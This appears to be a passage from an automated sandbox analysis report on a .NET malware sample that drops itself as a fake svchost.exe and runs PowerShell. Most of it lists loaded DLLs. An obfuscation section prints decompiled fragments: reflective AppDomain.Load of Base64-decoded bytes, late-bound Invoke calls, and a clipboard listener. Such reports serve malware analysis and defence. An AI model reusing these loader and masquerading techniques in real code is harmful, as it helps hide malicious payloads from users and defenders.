                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                        Source: svchost.lnk.0.drLNK file: ..\..\..\..\..\..\Local\svchost.exe
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Data Obfuscation

                        barindex
                        Source: file.exe, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.RNjBuCeTZYIun9E53FfX1OsyTO2DnyAN6BQIjKCystVf7fPsw1HXZouBKxLdqvdYkPc7khqTrK,ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.bi6cdzt7Ywd1g8e1Cq80Xl38CPDvRM4iRVPu3JyjtGFTW6QSLOTosjbFg1FwUdJAvqxHBHIseH,ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.LQpKx3GXNkqDhLsBSbBsMCr5D7li68PkDW207eCSLdbwPkhg5YYrXdhTC2EO2kKGsv6DJCY4li,ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.A8J9clTkRbTjq5n2bj2GX8aNTHu8LKOol3LSLKYDXjKDcBL9XeYqgKm4wJI5NohZnMALvb4mfO,qfyXcGSO3n7MPwJUdF1pWpSgkJoqnG02l2.UEyH2gVbBguCzQIaFjgN9VKXo49VIR9eo8()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: file.exe, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{NxU4LPwpKcjzEIxtJPWLhbmlv6cjHgnBUa68TNLD7JBtlmTN[2],qfyXcGSO3n7MPwJUdF1pWpSgkJoqnG02l2.BCwC9znM7KwZ11s7K03hIg34Tx0w5fBH4R(Convert.FromBase64String(NxU4LPwpKcjzEIxtJPWLhbmlv6cjHgnBUa68TNLD7JBtlmTN[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: svchost.exe.0.dr, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.RNjBuCeTZYIun9E53FfX1OsyTO2DnyAN6BQIjKCystVf7fPsw1HXZouBKxLdqvdYkPc7khqTrK,ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.bi6cdzt7Ywd1g8e1Cq80Xl38CPDvRM4iRVPu3JyjtGFTW6QSLOTosjbFg1FwUdJAvqxHBHIseH,ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.LQpKx3GXNkqDhLsBSbBsMCr5D7li68PkDW207eCSLdbwPkhg5YYrXdhTC2EO2kKGsv6DJCY4li,ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.A8J9clTkRbTjq5n2bj2GX8aNTHu8LKOol3LSLKYDXjKDcBL9XeYqgKm4wJI5NohZnMALvb4mfO,qfyXcGSO3n7MPwJUdF1pWpSgkJoqnG02l2.UEyH2gVbBguCzQIaFjgN9VKXo49VIR9eo8()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: svchost.exe.0.dr, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{NxU4LPwpKcjzEIxtJPWLhbmlv6cjHgnBUa68TNLD7JBtlmTN[2],qfyXcGSO3n7MPwJUdF1pWpSgkJoqnG02l2.BCwC9znM7KwZ11s7K03hIg34Tx0w5fBH4R(Convert.FromBase64String(NxU4LPwpKcjzEIxtJPWLhbmlv6cjHgnBUa68TNLD7JBtlmTN[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: file.exe, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs.Net Code: h2K9gOohbq3M8rqAOafDLLs5Pt18vNON3CimuQRt64O2Q78C System.AppDomain.Load(byte[])
                        Source: file.exe, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs.Net Code: _1BAWRDjVJ7Ll0s3RDD6t7gfucqfwOMgHc07WGINbGHSNHnGi System.AppDomain.Load(byte[])
                        Source: file.exe, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs.Net Code: _1BAWRDjVJ7Ll0s3RDD6t7gfucqfwOMgHc07WGINbGHSNHnGi
                        Source: svchost.exe.0.dr, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs.Net Code: h2K9gOohbq3M8rqAOafDLLs5Pt18vNON3CimuQRt64O2Q78C System.AppDomain.Load(byte[])
                        Source: svchost.exe.0.dr, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs.Net Code: _1BAWRDjVJ7Ll0s3RDD6t7gfucqfwOMgHc07WGINbGHSNHnGi System.AppDomain.Load(byte[])
                        Source: svchost.exe.0.dr, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.cs.Net Code: _1BAWRDjVJ7Ll0s3RDD6t7gfucqfwOMgHc07WGINbGHSNHnGi
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD9A3B2859 push ebx; retf 0_2_00007FFD9A3B28CA
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD9A3B3D1D push ebx; ret 0_2_00007FFD9A3B3D2A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9A2CD2A5 pushad ; iretd 1_2_00007FFD9A2CD2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9A4B2316 push 8B485F92h; iretd 1_2_00007FFD9A4B231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9A2BD2A5 pushad ; iretd 4_2_00007FFD9A2BD2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9A4A2316 push 8B485F93h; iretd 4_2_00007FFD9A4A231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9A2AD2A5 pushad ; iretd 7_2_00007FFD9A2AD2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9A492316 push 8B485F94h; iretd 7_2_00007FFD9A49231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9A29D2A5 pushad ; iretd 11_2_00007FFD9A29D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9A3B0E10 push eax; retf 11_2_00007FFD9A3B0E1D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9A482316 push 8B485F95h; iretd 11_2_00007FFD9A48231B
                        Source: file.exe, H6T3tP17TmcZ3WvcUbNe0fKNqn2xzzv9gr.csHigh entropy of concatenated method names: '_9la3kYFUFspNKtsyfk1E68GOJuw43oK1IO', 'LSGXadrUAzufBD7TZ7mCREp4xPYvmu8G8D', 'bSK2fMHxHTmyXK3cMhtrLNbpafqBDr7JAu', 'P6s6CpsDBfG', 'Xv32KgMzRSG', 'rrxf2jUb73w', '_30TXgtLPnfu', 'rUZPrBZ90ST', '_3Hg0sOIo9S0', '_3k9ihuiJKJJ'
                        Source: file.exe, ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.csHigh entropy of concatenated method names: 'kxNS7DRtyiZO1GgmJ4IPz80LkqLVuL12dSF0n806TsutGb99Ot26vknO81wFV7WJUV', 'QdKXWgjPHty3ZYgA7efLbafkJtZoIzle68O6oS5vwthbTixJEKpyqifHg8pHVbvUlS', '_3FRPZFR131NguWWpsElDs1MtJwcglFyJgvhQDQFPeNIJzLmX4B5SWxIhyH9ZfFMb5q', 'QIXBrzcJairtR0abmwC056OU82Tta2CabXpMloLgqmN7iy4ymyAg3RYPGajdMXJ3BO'
                        Source: file.exe, 70vQK4T18Gm0g4mAwA32uNHAReNFu5quyXyREL1YB99jawH4E8OZaSohyRuIt66XAYe04IU0tt.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_8ibCuAx1thyoSp5nckruyTswUpc446mqXpfqG9V7VwnsLuLJCaMAvu93190jiY8hle', 'eCLAUtM40b0FqUn2h1klKYw5KLkvfp483TJe3w6xFIWcOeWuFnSoBphQnRkysF5UzA', 'JYbSleVMv2LageDeGehPYB3feoigP2jPD76rHDcooMKKy1W2FvCupCmQM2CvhVsBXU', 'L61pK1ZAKqzpW72rMXu1U8uCioQoiIB64eQmOOxYbaf7Cdby3Rw5yreXQsZACuD3uJ'
                        Source: file.exe, UeVea6O6GzmMbCRBxlRfSNhZOZxIujfjvVpWRPCUkEVlV052.csHigh entropy of concatenated method names: '_6m0nJorGnpvswOX8eTX7z9Jp6tf7aDa0LusUiMEjACi1ZWk1', 'r0pEYKWjoIfZuGhxYjfk76zAJP', 'vQp5CyD8U1RRU3aqr5weYDugZZ', 'iKrmP7AV8J1WsUQQ9H0G1qZDzk', 'XghfxRpplj8uNeGNl1H9PDimZe'
                        Source: file.exe, hqiedDAFT8Px8D3Ghu7ypyyCQyfPNzWS3H.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'OYDQIkmJMPpKj3GYltxlBI1B5qyTqZSCqO', 'wsOb73YquTz', 'g4n1nVSNwNC', 'xj5A49ghaEp', 'CyONxGZgX18'
                        Source: file.exe, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.csHigh entropy of concatenated method names: 'EdFW4YFiSkbQxZ5d4qQmNPsN9soOEYTNdl5vCM4WrlKuS4o1', 'h2K9gOohbq3M8rqAOafDLLs5Pt18vNON3CimuQRt64O2Q78C', 'ogt4WZTPLCR5Ukdw7p4iVE3U3QNF7gwgfMYTtSczP5CH3PFs', 'IyVRozfUAwV4BczlXzm2h5AOSZ87wZ948X6yw1dpAxtrYCru', '_5FGhL3XPfMlotCKdM8AAb0pHLX9Eoh5KypoNiPXgT9DiPnDy', 'Tm71IDO5pxQrhw3HDy4qsXciC1HiKFCvkUCA2wqdyyA74uvn', 'XDUHRjTdEJPyG37IJbtt5SqhShsRBRfj86oLaoJcaDxkZpXv', '_60O1mRAd4ikIerIYomRmHVz5e2a7e9pXqTWgJH8IDiW3rI7J', 'ixCDJqfXOtGwj8HnnZUHghcmsyPXXguAkKqwPfPdZG3Hrd7I', '_5JBaulXVr29IhqORj1mx6IDOjqrbHPXtHMBKvn3LucPwz7td'
                        Source: file.exe, ke6P6rtJCZBKy9hI.csHigh entropy of concatenated method names: 'Q10pC7edpYffdkZt', '_89UNfPpYp8CTinab', 'KzyZGapq70hkl1dS', 'lky8iSY3iXulBwHF', 'N1HydT3ak1CsVszy', 'hKtyQaSs1hTUBOzM', 'vWbfcf1dfJjBXq1n', 'DFEQrXpV8G4QwS8L', 'PzbEQa2Mmk3GohKZ', 'yAgoQ4Abcp3IXEMi'
                        Source: file.exe, TnghBFUTZVgmG5vF.csHigh entropy of concatenated method names: 'ZVO1ubevYLCMbR9I', 'BerbwhxOL6fpJIUg', 'Dwn2XH6PT1c7QjLz', 'XeacGh5DgP0xISpI', 'dTgH8hOARwOQAnZo', 'nfisZZbXZIqOti1g', 'WB5Z308EPrPWnLlG', 'YT5OUy07NebW69WYkUnO8cVr4CGe7jGkd4X79tAdSbvwRIy88OFyM83ZNjnWLGsW1e', 'Xi2oD40emha77cFmVAWidnim9la1yWOfNQrAIu9bmxcqOIIKTT5W4OZzeszzjCcbV6', 'wV8RExrWHEePxD8tFZSvesDMCzUgIeaGh5oCOBu8e1mJxDlXyQNvS70v5WlOIcigo1'
                        Source: file.exe, Ov5jMSR8vkyDZYBx5fGlGH5gNTyZ71EQKT.csHigh entropy of concatenated method names: 'U3LqZaYOrYlmJECKaIdCxggvmvLxsV89zn', 'dliJf69zCLyqTsFaZCo6JAZbFJV4qsxJ8t', 'VHtdfhVhMn43Pu1x6JtNuLlSekwln4O10m', 'Eag0t8thTS5YV5bSB1spMnsfRYPlrHT0kc', 'mS6Gf4WirHQ', 'ZdHOGgcYdMo', 'vVgCkvlUn8u', 'vH4QfFczzMn', '_4tubCRheGoN', 'rBdc6l9Y29C'
                        Source: file.exe, nMYIDkarGL7TGc5L58MQaBjripxccmCr6ipNleJlm20t3SaA.csHigh entropy of concatenated method names: 'UcZXNi7ukRB8NdzY8y1O6D1PfsixKLgyMChiO4efH2dCfBo7', 'vPoRkSXHwBF0Ckqt4K3N4mYzcHMQSKILLECQtUsxDJdpZNsZ', 'P4t4HZ5HHObv6AsQIFrHmQ8jIgSiYaPsFbhdJiiGWGTFjuGt', 'MBbUboIbkN6zFEObqIoKkwIXOZ2UA6bVfrIwzULhRmMVj5pH', 'WYjtZRRhzZ9b6kFyTUFljqxLODSbhL6btWvYvrinDRuykMBs', 'o5wZmlreA0t971kCFsBb0CbzG5S8aqTH2c4KqPPsef72cgoS', 'v6J9NL7s5HlK9Btg48oGayCKz2qSI6ZVtpR6pEENIYH8zWKi', 'NeacyHjERGErWPVrNOcCTlMq46dgzyaVgr6HGoWnxpHPoT5P', 'A4fh471c8kpO2KmXpaE86Bou0xxh9D5BOap8H4xmim25Hf6L', 'ZWqcdYnIg62jUlW5M8qWFlgjAE951btOlp44FcpRHUJD6LKX'
                        Source: file.exe, qfyXcGSO3n7MPwJUdF1pWpSgkJoqnG02l2.csHigh entropy of concatenated method names: 'i7cyD0XTLEB0Eo6PcSMqpwbf4hMZg4sLYG', 'ygPwp9XZp1CNtXOvYnoSnk60K0pR4EzVwC', 'rDdzoPBPDGIhemY4IkLdEpjByHJCZf9ZZk', 'iayxv8iOD5PJUikNajoF8bAzd4OR0W1BOJ', '_5qRtMLOzp6vegzQlmGY0VvqtTEVxrzkOnV', 'sxvswXulgNMspyjbFclySjAL0qULrND153', 'ZkGh8jLFkXbpaAG3167hzW7mElum0Gzy4o', 'U0SMh7MOgaMA9emgAlTtfkDQ8K2p40TY3n', 'V9zlnJ7JAd6MhnJZXfbmyCeUH9Fp8zg3RZ', '_1kXGJPvV0iV4mL17w9kNyBIfBwGJWszAhI'
                        Source: svchost.exe.0.dr, H6T3tP17TmcZ3WvcUbNe0fKNqn2xzzv9gr.csHigh entropy of concatenated method names: '_9la3kYFUFspNKtsyfk1E68GOJuw43oK1IO', 'LSGXadrUAzufBD7TZ7mCREp4xPYvmu8G8D', 'bSK2fMHxHTmyXK3cMhtrLNbpafqBDr7JAu', 'P6s6CpsDBfG', 'Xv32KgMzRSG', 'rrxf2jUb73w', '_30TXgtLPnfu', 'rUZPrBZ90ST', '_3Hg0sOIo9S0', '_3k9ihuiJKJJ'
                        Source: svchost.exe.0.dr, ZsxvaOwO9GZDCq1vhOEiPsaOtfpGyCPBxKAftjzq0RZ5Uj7emntLjaQhD4BZNs8tJaYPG7iVKE.csHigh entropy of concatenated method names: 'kxNS7DRtyiZO1GgmJ4IPz80LkqLVuL12dSF0n806TsutGb99Ot26vknO81wFV7WJUV', 'QdKXWgjPHty3ZYgA7efLbafkJtZoIzle68O6oS5vwthbTixJEKpyqifHg8pHVbvUlS', '_3FRPZFR131NguWWpsElDs1MtJwcglFyJgvhQDQFPeNIJzLmX4B5SWxIhyH9ZfFMb5q', 'QIXBrzcJairtR0abmwC056OU82Tta2CabXpMloLgqmN7iy4ymyAg3RYPGajdMXJ3BO'
                        Source: svchost.exe.0.dr, 70vQK4T18Gm0g4mAwA32uNHAReNFu5quyXyREL1YB99jawH4E8OZaSohyRuIt66XAYe04IU0tt.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_8ibCuAx1thyoSp5nckruyTswUpc446mqXpfqG9V7VwnsLuLJCaMAvu93190jiY8hle', 'eCLAUtM40b0FqUn2h1klKYw5KLkvfp483TJe3w6xFIWcOeWuFnSoBphQnRkysF5UzA', 'JYbSleVMv2LageDeGehPYB3feoigP2jPD76rHDcooMKKy1W2FvCupCmQM2CvhVsBXU', 'L61pK1ZAKqzpW72rMXu1U8uCioQoiIB64eQmOOxYbaf7Cdby3Rw5yreXQsZACuD3uJ'
                        Source: svchost.exe.0.dr, UeVea6O6GzmMbCRBxlRfSNhZOZxIujfjvVpWRPCUkEVlV052.csHigh entropy of concatenated method names: '_6m0nJorGnpvswOX8eTX7z9Jp6tf7aDa0LusUiMEjACi1ZWk1', 'r0pEYKWjoIfZuGhxYjfk76zAJP', 'vQp5CyD8U1RRU3aqr5weYDugZZ', 'iKrmP7AV8J1WsUQQ9H0G1qZDzk', 'XghfxRpplj8uNeGNl1H9PDimZe'
                        Source: svchost.exe.0.dr, hqiedDAFT8Px8D3Ghu7ypyyCQyfPNzWS3H.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'OYDQIkmJMPpKj3GYltxlBI1B5qyTqZSCqO', 'wsOb73YquTz', 'g4n1nVSNwNC', 'xj5A49ghaEp', 'CyONxGZgX18'
                        Source: svchost.exe.0.dr, S9v6FPHPOdsnN8wBs54k2fCeDH2LfA4Ua448M7mpbxghnhim.csHigh entropy of concatenated method names: 'EdFW4YFiSkbQxZ5d4qQmNPsN9soOEYTNdl5vCM4WrlKuS4o1', 'h2K9gOohbq3M8rqAOafDLLs5Pt18vNON3CimuQRt64O2Q78C', 'ogt4WZTPLCR5Ukdw7p4iVE3U3QNF7gwgfMYTtSczP5CH3PFs', 'IyVRozfUAwV4BczlXzm2h5AOSZ87wZ948X6yw1dpAxtrYCru', '_5FGhL3XPfMlotCKdM8AAb0pHLX9Eoh5KypoNiPXgT9DiPnDy', 'Tm71IDO5pxQrhw3HDy4qsXciC1HiKFCvkUCA2wqdyyA74uvn', 'XDUHRjTdEJPyG37IJbtt5SqhShsRBRfj86oLaoJcaDxkZpXv', '_60O1mRAd4ikIerIYomRmHVz5e2a7e9pXqTWgJH8IDiW3rI7J', 'ixCDJqfXOtGwj8HnnZUHghcmsyPXXguAkKqwPfPdZG3Hrd7I', '_5JBaulXVr29IhqORj1mx6IDOjqrbHPXtHMBKvn3LucPwz7td'
                        Source: svchost.exe.0.dr, ke6P6rtJCZBKy9hI.csHigh entropy of concatenated method names: 'Q10pC7edpYffdkZt', '_89UNfPpYp8CTinab', 'KzyZGapq70hkl1dS', 'lky8iSY3iXulBwHF', 'N1HydT3ak1CsVszy', 'hKtyQaSs1hTUBOzM', 'vWbfcf1dfJjBXq1n', 'DFEQrXpV8G4QwS8L', 'PzbEQa2Mmk3GohKZ', 'yAgoQ4Abcp3IXEMi'
                        Source: svchost.exe.0.dr, TnghBFUTZVgmG5vF.csHigh entropy of concatenated method names: 'ZVO1ubevYLCMbR9I', 'BerbwhxOL6fpJIUg', 'Dwn2XH6PT1c7QjLz', 'XeacGh5DgP0xISpI', 'dTgH8hOARwOQAnZo', 'nfisZZbXZIqOti1g', 'WB5Z308EPrPWnLlG', 'YT5OUy07NebW69WYkUnO8cVr4CGe7jGkd4X79tAdSbvwRIy88OFyM83ZNjnWLGsW1e', 'Xi2oD40emha77cFmVAWidnim9la1yWOfNQrAIu9bmxcqOIIKTT5W4OZzeszzjCcbV6', 'wV8RExrWHEePxD8tFZSvesDMCzUgIeaGh5oCOBu8e1mJxDlXyQNvS70v5WlOIcigo1'
                        Source: svchost.exe.0.dr, Ov5jMSR8vkyDZYBx5fGlGH5gNTyZ71EQKT.csHigh entropy of concatenated method names: 'U3LqZaYOrYlmJECKaIdCxggvmvLxsV89zn', 'dliJf69zCLyqTsFaZCo6JAZbFJV4qsxJ8t', 'VHtdfhVhMn43Pu1x6JtNuLlSekwln4O10m', 'Eag0t8thTS5YV5bSB1spMnsfRYPlrHT0kc', 'mS6Gf4WirHQ', 'ZdHOGgcYdMo', 'vVgCkvlUn8u', 'vH4QfFczzMn', '_4tubCRheGoN', 'rBdc6l9Y29C'
                        Source: svchost.exe.0.dr, nMYIDkarGL7TGc5L58MQaBjripxccmCr6ipNleJlm20t3SaA.csHigh entropy of concatenated method names: 'UcZXNi7ukRB8NdzY8y1O6D1PfsixKLgyMChiO4efH2dCfBo7', 'vPoRkSXHwBF0Ckqt4K3N4mYzcHMQSKILLECQtUsxDJdpZNsZ', 'P4t4HZ5HHObv6AsQIFrHmQ8jIgSiYaPsFbhdJiiGWGTFjuGt', 'MBbUboIbkN6zFEObqIoKkwIXOZ2UA6bVfrIwzULhRmMVj5pH', 'WYjtZRRhzZ9b6kFyTUFljqxLODSbhL6btWvYvrinDRuykMBs', 'o5wZmlreA0t971kCFsBb0CbzG5S8aqTH2c4KqPPsef72cgoS', 'v6J9NL7s5HlK9Btg48oGayCKz2qSI6ZVtpR6pEENIYH8zWKi', 'NeacyHjERGErWPVrNOcCTlMq46dgzyaVgr6HGoWnxpHPoT5P', 'A4fh471c8kpO2KmXpaE86Bou0xxh9D5BOap8H4xmim25Hf6L', 'ZWqcdYnIg62jUlW5M8qWFlgjAE951btOlp44FcpRHUJD6LKX'
